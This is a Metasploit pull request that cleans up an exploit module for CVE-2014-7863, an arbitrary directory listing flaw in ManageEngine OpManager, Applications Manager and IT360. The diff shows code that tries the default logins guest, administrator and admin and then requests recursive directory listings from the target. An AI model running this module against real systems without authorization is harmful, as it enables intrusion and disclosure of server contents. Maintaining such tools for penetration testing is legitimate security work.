### PR TITLE
Clean OpManager directory content disclosure module

### DIFF
--- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb
+++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb
@@ -165,25 +165,14 @@ class Metasploit3 < Msf::Auxiliary
       end
     end
 
-    # Trying with the default guest password
-    print_status("#{peer} - Trying to authenticate as guest/guest...")
-    cookie = authenticate_it360(uri[0], uri[1], 'guest', 'guest')
-    unless cookie.nil?
-      return cookie
-    end
+    default_users = ['guest', 'administrator', 'admin']
 
-    # we've tried with the default guest password, now let's try with the default admin password
-    print_status("#{peer} - Trying to authenticate as administrator/administrator...")
-    cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
-    unless cookie.nil?
-      return cookie
-    end
-
-    # Try one more time with the default admin login for some versions
-    print_status("#{peer} - Trying to authenticate as admin/admin...")
-    cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
-    unless cookie.nil?
-      return cookie
+    default_users.each do |user|
+      print_status("#{peer} - Trying to authenticate as #{user}...")
+      cookie = authenticate_it360(uri[0], uri[1], user, user)
+      unless cookie.nil?
+        return cookie
+      end
     end
 
     nil

--- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb
+++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb
@@ -112,10 +112,8 @@ class Metasploit3 < Msf::Auxiliary
       }
     end
 
-    op_port = datastore['RPORT']
-    datastore['RPORT'] = port
-
     res = send_request_cgi({
+      'rport' => port,
       'method' => 'POST',
       'uri' => normalize_uri(path),
       'vars_get' => {
@@ -125,8 +123,6 @@ class Metasploit3 < Msf::Auxiliary
       },
       'vars_post' => vars_post
     })
-
-    datastore['RPORT'] = op_port
 
     if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
       # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
@@ -217,7 +213,7 @@ class Metasploit3 < Msf::Auxiliary
         'vars_get' => {
           'operation' => 'listdirectory',
           'rootDirectory' => datastore['DIRECTORY']
-        },
+        }
       })
     rescue Rex::ConnectionRefused
       print_error("#{peer} - Could not connect.")
@@ -225,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     # Show data if needed
-    if res && res.code == 200
+    if res && res.code == 200 && res.body
       vprint_line(res.body.to_s)
       fname = File.basename(datastore['DIRECTORY'])
 
@@ -233,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary
         'manageengine.http',
         'text/plain',
         datastore['RHOST'],
-        res.body,
+        res.body.to_s,
         fname
       )
       print_good("File with directory listing saved in: #{path}")

--- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb
+++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb
@@ -12,35 +12,33 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "ManageEngine OpManager / Applications Manager / IT360 Arbitrary Directory Listing",
+      'Name'           => "ManageEngine Multiple Products Arbitrary Directory Listing",
       'Description'    => %q{
-          This module exploits a directory listing information disclosure vulnerability in
-          FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360.
-          It recurses through diretories, so it will list the whole drive if you ask it to list
-          / in Linux or C:\ in Windows.
-          This vulnerability is unauthenticated on OpManager and Applications Manager, but
-          authenticated in IT360. This module will attempt to login using the default
-          credentials for the administrator and guest accounts; alternatively you can provide a
-          pre-authenticated cookie or a username / password combo.
-          For IT360 targets enter the RPORT of the OpManager instance (usually 8300).
-          This module has been tested on both Windows and Linux with several different versions
-          Windows paths have to be escaped with 4 backslashes on the command line.
-          There is a companion module that allows you to download an arbitrary file.
-          This vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.          
+        This module exploits a directory listing information disclosure vulnerability in the
+        FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It
+        makes a recursive listing, so it will list the whole drive if you ask it to list / in
+        Linux or C:\ in Windows. This vulnerability is unauthenticated on OpManager and
+        Applications Manager, but authenticated in IT360. This module will attempt to login
+        using the default credentials for the administrator and guest accounts; alternatively
+        you can provide a pre-authenticated cookie or a username / password combo. For IT360
+        targets enter the RPORT of the OpManager instance (usually 8300). This module has been
+        tested on both Windows and Linux with several different versions Windows paths have to
+        be escaped with 4 backslashes on the command line. There is a companion module that
+        allows you to download an arbitrary file. This vulnerability has been fixed in Applications
+        Manager v11.9 b11912 and OpManager 11.6.
       },
-      'Author'       =>
+      'Author'         =>
         [
           'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
         ],
-      'License'     => MSF_LICENSE,
+      'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2014-7863' ],
-          [ 'OSVDB', 'TODO' ],
-          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt' ],
-          [ 'URL', 'FULLDISC_URL' ]
+          ['CVE', '2014-7863'],
+          ['OSVDB', 'TODO'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
+          ['URL', 'FULLDISC_URL']
         ],
-      'DefaultOptions' => { 'WfsDelay' => 30 },
       'DisclosureDate' => 'Jan 28 2015'))
 
     register_options(


### PR DESCRIPTION
Helo @pedrib,

This pull request makes some code cleaning to https://github.com/rapid7/metasploit-framework/pull/4659, just minor changes. Feel free to review, check, test, discuss anything and land once you're comfortable. https://github.com/rapid7/metasploit-framework/pull/4659 will be ready to go once the references are filled or you say it is good to go without these references, thanks!